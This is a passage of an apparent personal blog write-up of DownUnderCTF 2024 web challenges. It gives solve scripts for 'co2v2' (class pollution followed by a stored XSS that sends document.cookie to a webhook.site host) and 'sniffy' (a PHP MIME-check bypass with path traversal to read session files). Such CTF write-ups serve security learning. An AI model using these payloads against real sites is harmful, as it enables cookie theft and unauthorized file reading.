class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line"></span><br><span class="line">URL = &quot;https://web-co2v2-54990d5ba36d1ee8.2024.ductf.dev/&quot;</span><br><span class="line"></span><br><span class="line">s = requests.Session()</span><br><span class="line"></span><br><span class="line">def register(username, password):</span><br><span class="line">    data = &#123;&quot;username&quot;:username,&quot;password&quot;:password&#125;</span><br><span class="line">    print(f&quot;Registering &#123;username&#125; with password &#123;password&#125;&quot;)</span><br><span class="line">    s.post(URL + &quot;register&quot;, data=data)</span><br><span class="line">    return </span><br><span class="line"></span><br><span class="line">def login(username, password):</span><br><span class="line">    data = &#123;&quot;username&quot;:username,&quot;password&quot;:password&#125;</span><br><span class="line">    s.post(URL + &quot;login&quot;, data=data)</span><br><span class="line">    print(f&quot;Logging into &#123;username&#125;&quot;)</span><br><span class="line">    return </span><br><span class="line"></span><br><span class="line">def pollute():</span><br><span class="line"></span><br><span class="line">    templates_escape_all = &#123;</span><br><span class="line">        &quot;__class__&quot;:&#123;</span><br><span class="line">            &quot;__init__&quot;:&#123;</span><br><span class="line">                &quot;__globals__&quot;:&#123;</span><br><span class="line">                    &quot;TEMPLATES_ESCAPE_ALL&quot;: False</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    escape_rule = &#123;</span><br><span class="line">        &quot;policy&quot;: &quot;strict&quot;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    secret_nonce = &#123;</span><br><span class="line">        &quot;__class__&quot;:&#123;</span><br><span class="line">            &quot;__init__&quot;:&#123;</span><br><span class="line">                &quot;__globals__&quot;:&#123;</span><br><span class="line">                    &quot;SECRET_NONCE&quot;: &quot;&quot;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    random_count = &#123;</span><br><span class="line">        &quot;__class__&quot;:&#123;</span><br><span class="line">            &quot;__init__&quot;:&#123;</span><br><span class="line">                &quot;__globals__&quot;:&#123;</span><br><span class="line">                    &quot;RANDOM_COUNT&quot;: 0</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    print(f&quot;Polluting TEMPLATES_ESCAPE_ALL&quot;)        </span><br><span class="line">    s.post(URL + &quot;save_feedback&quot;, json=templates_escape_all)</span><br><span class="line"></span><br><span class="line">    print(f&quot;Updating escape rule&quot;)</span><br><span class="line">    s.post(URL + &quot;admin/update-accepted-templates&quot;, json=escape_rule)</span><br><span class="line"></span><br><span class="line">    print(f&quot;Polluting SECRET_NONCE&quot;)        </span><br><span class="line">    s.post(URL + &quot;save_feedback&quot;, json=secret_nonce)</span><br><span class="line"></span><br><span class="line">    print(f&quot;Polluting RANDOM_COUNT&quot;)        </span><br><span class="line">    s.post(URL + &quot;save_feedback&quot;, json=random_count)</span><br><span class="line"></span><br><span class="line">def XSS():</span><br><span class="line">    payload = &#123;</span><br><span class="line">        &quot;title&quot;:&quot;&quot;&quot;&lt;script nonce=&quot;8a5edab282632443219e051e4ade2d1d5bbc671c781051bf1437897cbdfea0f1&quot;&gt;window.location=&#x27;https://webhook.site/39cf3b9c-65eb-4098-a261-e98dc1d8e01b?f=&#x27;+document.cookie&lt;/script&gt;&quot;&quot;&quot;,</span><br><span class="line">        &quot;content&quot;:&quot;&quot;,</span><br><span class="line">        &quot;public&quot;:1,</span><br><span class="line">        &quot;save&quot;:&quot;Save Post&quot;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    print(f&quot;Creating XSS post&quot;)        </span><br><span class="line">    s.post(URL + &quot;create_post&quot;, data=payload)</span><br><span class="line"></span><br><span class="line">    print(&quot;Sending XSS to bot&quot;)</span><br><span class="line">    s.get(URL + &quot;api/v1/report&quot;)</span><br><span class="line"></span><br><span class="line">if __name__ == &quot;__main__&quot;:</span><br><span class="line">    username = &quot;XSS&quot;</span><br><span class="line">    password = &quot;XSS&quot;</span><br><span class="line">    register(username, password)</span><br><span class="line">    login(username,password)</span><br><span class="line">    pollute()</span><br><span class="line">    XSS()</span><br><span class="line"></span><br><span class="line">DUCTF&#123;_1_d3cid3_wh4ts_esc4p3d_&#125;</span><br></pre></td></tr></table></figure>

<h1 id="Web-sniffy"><a href="#Web-sniffy" class="headerlink" title="[Web] sniffy"></a>[Web] sniffy</h1><h2 id="Description-4"><a href="#Description-4" class="headerlink" title="Description"></a>Description</h2><blockquote>
<p>Visit our sanctuary to hear the sounds of the Kookaburras!</p>
</blockquote>
<h2 id="Analysis-4"><a href="#Analysis-4" class="headerlink" title="Analysis"></a>Analysis</h2><p>The goal is to achieve LFI to read the PHP session file which contains the flag. However, as the MIME type of our PHP session is text&#x2F;plain, we are unable to read it directly.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">$_SESSION[&#x27;flag&#x27;] = FLAG; /* Flag is in the session here! */</span><br><span class="line"></span><br><span class="line">...</span><br><span class="line"></span><br><span class="line">$file = &#x27;audio/&#x27; . $_GET[&#x27;f&#x27;];</span><br><span class="line"></span><br><span class="line">if (!file_exists($file)) &#123;</span><br><span class="line">	http_response_code(404); die;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$mime = mime_content_type($file);</span><br><span class="line"></span><br><span class="line">if (!$mime || !str_starts_with($mime, &#x27;audio&#x27;)) &#123;</span><br><span class="line">	http_response_code(403); die;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">header(&quot;Content-Type: $mime&quot;);</span><br><span class="line">readfile($file);</span><br></pre></td></tr></table></figure>

<h2 id="Solution-4"><a href="#Solution-4" class="headerlink" title="Solution"></a>Solution</h2><p>There is an audio MIME type defined with an offset of <a target="_blank" rel="noopener" href="https://sources.debian.org/src/dares/0.6.5-7/magic.mime/" title="Title">1080</a>. Utilising the injection point into the session, we can inject this MIME type into the session file by brute forcing the characters until offset 1080 is (M.K.). This would bypass the MIME type check.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">#audio/x-screamtracker-module</span><br><span class="line">1080    string    M.K.        audio/x-mod</span><br><span class="line"></span><br><span class="line">$_SESSION[&#x27;theme&#x27;] = $_GET[&#x27;theme&#x27;] ?? $_SESSION[&#x27;theme&#x27;] ?? &#x27;light&#x27;;</span><br></pre></td></tr></table></figure>


<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line"></span><br><span class="line">URL = &quot;https://web-sniffy-d9920bbcf9df.2024.ductf.dev/&quot;</span><br><span class="line">s = requests.Session()</span><br><span class="line"></span><br><span class="line">s.get(URL)</span><br><span class="line">cookies = s.cookies[&#x27;PHPSESSID&#x27;]</span><br><span class="line"></span><br><span class="line">for i in range(500):</span><br><span class="line">    code = &quot;A&quot; * 1000 + &quot;B&quot; * i + &#x27;M.K.&#x27;</span><br><span class="line">    r = s.get(f&#x27;&#123;URL&#125;/index.php?theme=&#123;code&#125;&#x27;)</span><br><span class="line">    r2 = requests.get(f&#x27;&#123;URL&#125;/audio.php?f=../../../../../tmp/sess_&#123;cookies&#125;&#x27;)</span><br><span class="line">    if r2.status_code == 403:</span><br><span class="line">        print(f&#x27;Trying &#123;i&#125;&#x27;)</span><br><span class="line">        continue</span><br><span class="line">    else:</span><br><span class="line">        print(r2.text)</span><br><span class="line">        break</span><br><span class="line"></span><br><span class="line">DUCTF&#123;koo-koo-koo-koo-koo-ka-ka-ka-ka-kaw-kaw-kaw!!&#125;</span><br></pre></td></tr></table></figure>
  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Web-parrot-the-emu"><span class="toc-number">1.</span> <span class="toc-text">[Web] parrot the emu</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Description"><span class="toc-number">1.1.</span> <span class="toc-text">Description</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Analysis"><span class="toc-number">1.2.</span> <span class="toc-text">Analysis</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Solution"><span class="toc-number">1.3.</span> <span class="toc-text">Solution</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Web-co2"><span class="toc-number">2.</span> <span class="toc-text">[Web] co2</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Description-1"><span class="toc-number">2.1.</span> <span class="toc-text">Description</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Analysis-1"><span class="toc-number">2.2.</span> <span class="toc-text">Analysis</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Solution-1"><span class="toc-number">2.3.</span> <span class="toc-text">Solution</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Payload"><span class="toc-number">2.4.</span> <span class="toc-text">Payload</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Web-hah-got-em"><span class="toc-number">3.</span> <span class="toc-text">[Web] hah got em</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Description-2"><span class="toc-number">3.1.</span> <span class="toc-text">Description</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Analysis-2"><span class="toc-number">3.2.</span> <span class="toc-text">Analysis</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Solution-2"><span class="toc-number">3.3.</span> <span class="toc-text">Solution</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Payload-1"><span class="toc-number">3.4.</span> <span class="toc-text">Payload</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Web-co2v2"><span class="toc-number">4.</span> <span class="toc-text">[Web] co2v2</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Description-3"><span class="toc-number">4.1.</span> <span class="toc-text">Description</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Analysis-3"><span class="toc-number">4.2.</span> <span class="toc-text">Analysis</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Solution-3"><span class="toc-number">4.3.</span> <span class="toc-text">Solution</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Payload-2"><span class="toc-number">4.4.</span> <span class="toc-text">Payload</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Web-sniffy"><span class="toc-number">5.</span> <span class="toc-text">[Web] sniffy</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Description-4"><span class="toc-number">5.1.</span> <span class="toc-text">Description</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Analysis-4"><span class="toc-number">5.2.</span> <span class="toc-text">Analysis</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Solution-4"><span class="toc-number">5.3.</span> <span class="toc-text">Solution</span></a></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://chuajianshen.github.io/2024/07/06/DownUnderCTF2024/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://chuajianshen.github.io/2024/07/06/DownUnderCTF2024/&text=DownUnderCTF2024"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://chuajianshen.github.io/2024/07/06/DownUnderCTF2024/&title=DownUnderCTF2024"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://chuajianshen.github.io/2024/07/06/DownUnderCTF2024/&is_video=false&description=DownUnderCTF2024"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=DownUnderCTF2024&body=Check out this article: https://chuajianshen.github.io/2024/07/06/DownUnderCTF2024/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://chuajianshen.github.io/2024/07/06/DownUnderCTF2024/&title=DownUnderCTF2024"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://chuajianshen.github.io/2024/07/06/DownUnderCTF2024/&title=DownUnderCTF2024"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://chuajianshen.github.io/2024/07/06/DownUnderCTF2024/&title=DownUnderCTF2024"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://chuajianshen.github.io/2024/07/06/DownUnderCTF2024/&title=DownUnderCTF2024"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://chuajianshen.github.io/2024/07/06/DownUnderCTF2024/&name=DownUnderCTF2024&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://chuajianshen.github.io/2024/07/06/DownUnderCTF2024/&t=DownUnderCTF2024"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2024
    Shen
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
